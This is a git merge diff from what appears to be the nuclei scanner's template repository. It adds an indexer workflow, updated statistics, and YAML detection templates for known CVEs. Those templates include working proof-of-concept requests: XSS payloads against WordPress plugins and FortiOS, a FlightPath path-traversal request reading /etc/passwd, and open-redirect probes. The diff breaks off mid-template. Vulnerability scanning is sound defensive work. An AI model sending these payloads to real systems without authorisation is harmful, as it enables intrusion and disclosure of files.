Merge remote-tracking branch 'upstream/master'
commit
009bccc5f2
|
@ -0,0 +1,30 @@
|
|||
name: 📑 Template-DB Indexer
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
- name: Intalling Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
cd nucleish-api/cmd/generate-index/
|
||||
go install
|
||||
|
||||
- name: Generate Index
|
||||
env:
|
||||
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||
run: |
|
||||
generate-index -mode templates
|
||||
generate-index -mode changelog
|
|
@ -7,10 +7,9 @@
|
|||
# tags is a list of tags to ignore execution for
|
||||
# unless asked for by the user.
|
||||
|
||||
tags:
|
||||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
|
|
@ -60,7 +60,7 @@ git add .
|
|||
git commit -m "Added/Fixed/Updated XXX Template"
|
||||
```
|
||||
|
||||
**NOTE**:
|
||||
**NOTE**:
|
||||
|
||||
- A Pull Request should have only one unique template to make it simple for review.
|
||||
- Multiple templates for same technology can be grouped into single Pull Request.
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
|
||||
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
|
||||
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
|
||||
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
|
||||
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
|
||||
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
|
||||
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
|
||||
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
|
||||
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
|
||||
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
|
||||
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
|
||||
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
|
||||
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
|
||||
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
|
||||
|
||||
**203 directories, 3004 files**.
|
||||
**212 directories, 3054 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
2425
TEMPLATES-STATS.md
2425
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
|
||||
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
|
||||
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
|
||||
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
|
||||
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
|
||||
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
|
||||
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
|
||||
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
|
||||
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
|
||||
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
|
||||
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
|
||||
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
|
||||
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
|
||||
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
|
||||
|
|
|
@ -4,9 +4,14 @@ info:
|
|||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
remediation: There is currently no patch available.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 6.5
|
||||
cwe-id: CWE-276
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/01/26
|
||||
|
|
|
@ -643,7 +643,7 @@
|
|||
"author": "forgedhallpass",
|
||||
"links": {
|
||||
"github": "https://www.github.com/forgedhallpass",
|
||||
"twitter": "",
|
||||
"twitter": "https://twitter.com/forgedhallpass",
|
||||
"linkedin": "",
|
||||
"website": "",
|
||||
"email": ""
|
||||
|
|
|
@ -5,10 +5,13 @@ info:
|
|||
author: r3naissance
|
||||
severity: low
|
||||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
tags: cve,cve2000,frontpage,microsoft
|
||||
classification:
|
||||
cve-id: CVE-2000-0114
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -24,4 +27,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
||||
- "_vti_bin/shtml.dll"
|
||||
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -4,9 +4,14 @@ info:
|
|||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||
reference: https://www.exploit-db.com/exploits/24068
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/24068
|
||||
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
|
||||
tags: xss,squirrelmail,cve2004,cve
|
||||
classification:
|
||||
cve-id: CVE-2004-0519
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -28,3 +33,7 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -4,11 +4,14 @@ info:
|
|||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
classification:
|
||||
cve-id: CVE-2008-6172
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -34,4 +34,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -34,4 +34,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
|
@ -5,16 +5,19 @@ info:
|
|||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
|
||||
remediation: Upgrade to a supported version of Gog.
|
||||
reference:
|
||||
- http://www.securityfocus.com/bid/71187
|
||||
- http://seclists.org/fulldisclosure/2014/Nov/33
|
||||
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
|
||||
- http://gogs.io/docs/intro/change_log.html
|
||||
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
|
||||
- http://www.exploit-db.com/exploits/35238
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
|
||||
- http://www.securityfocus.com/archive/1/533995/100/0/threaded
|
||||
tags: cve,cve2014,sqli,gogs
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cve-id: CVE-2014-8682
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
shodan-query: 'title:"Sign In - Gogs"'
|
||||
|
||||
|
@ -34,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/02/01
|
||||
|
|
|
@ -30,3 +30,4 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 500
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-3978
|
||||
|
||||
info:
|
||||
name: FortiOS (Fortinet) - Open Redirect and XSS
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
|
||||
reference:
|
||||
- https://seclists.org/fulldisclosure/2016/Mar/68
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
|
||||
tags: cve,cve2016,redirect,fortinet,fortios
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2016-3978
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login?redir=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -3,7 +3,7 @@ info:
|
|||
author: Random_Robbie
|
||||
name: Apache Struts2 RCE
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
tags: cve,cve2017,struts,rce,apache
|
||||
reference: https://github.com/mazen160/struts-pwn
|
||||
classification:
|
||||
|
@ -25,4 +25,4 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "X-Hacker: Bounty Plz"
|
||||
part: header
|
||||
part: header
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2017-7391
|
||||
|
||||
info:
|
||||
name: Magmi – Cross-Site Scripting v.0.7.22
|
||||
name: Magmi Cross-Site Scripting v.0.7.22
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
||||
|
@ -25,12 +25,13 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
|
||||
reference:
|
||||
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: D-Link Routers - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
|
||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45678
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
caused by improper neutralization of special elements.
|
||||
An unauthenticated remote malicious user (or attacker) can supply
|
||||
specially crafted request parameters against Spring Data REST backed HTTP resources
|
||||
or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
|
||||
tags: cve,cve2018,vmware,rce,spring
|
||||
classification:
|
||||
|
|
|
@ -2,34 +2,38 @@ id: CVE-2018-13380
|
|||
|
||||
info:
|
||||
name: Fortinet FortiOS Cross-Site Scripting
|
||||
author: shelld3v
|
||||
author: shelld3v,AaronChen0
|
||||
severity: medium
|
||||
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
tags: cve,cve2018,fortios,xss,fortinet
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2018-13380
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2018,fortios,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
|
||||
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
||||
- "<script>alert(1337)</script>"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
negative: true
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-17254
|
||||
|
||||
info:
|
||||
name: Joomla JCK Editor SQL Injection
|
||||
name: Joomla! JCK Editor SQL Injection
|
||||
author: Suman_Kar
|
||||
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
|
||||
severity: critical
|
||||
|
@ -27,3 +27,5 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "nuclei-template"
|
||||
|
||||
# Enhanced by cs on 2022/02/01
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2019-13396
|
||||
info:
|
||||
name: FlightPath Local File Inclusion
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: high
|
||||
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47121
|
||||
- https://www.cvedetails.com/cve/CVE-2019-13396/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2019-13396
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2019,flightpath,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: token
|
||||
part: body
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- "idden' name='form_token' value='([a-z0-9]+)'>"
|
|
@ -31,3 +31,4 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 500
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2020-18268
|
||||
|
||||
info:
|
||||
name: Z-BlogPHP 1.5.2 Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
|
||||
reference:
|
||||
- https://github.com/zblogcn/zblogphp/issues/216
|
||||
- https://www.cvedetails.com/cve/CVE-2020-18268
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-18268
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,zblogphp,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zb_system/cmd.php?act=verify HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 81
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
|
||||
|
||||
- |
|
||||
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
|
||||
author: Ganofins
|
||||
severity: critical
|
||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
|
||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
|
||||
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
||||
tags: cve,cve2020,wordpress,wp-plugin,rce,upload
|
||||
classification:
|
||||
|
|
|
@ -29,9 +29,9 @@ requests:
|
|||
- "Contact Form 7"
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '^== Changelog =="'
|
||||
- type: word
|
||||
words:
|
||||
- '== Changelog =='
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2020-36365
|
||||
|
||||
info:
|
||||
name: Smartstore < 4.1.0 - Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
|
||||
reference:
|
||||
- https://github.com/smartstore/SmartStoreNET/issues/2113
|
||||
- https://www.cvedetails.com/cve/CVE-2020-36365
|
||||
- https://github.com/smartstore/SmartStoreNET
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-36365
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
shodan-query: http.html:'content="Smartstore'
|
||||
tags: cve,cve2020,redirect,smartstore
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: high
|
||||
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
|
||||
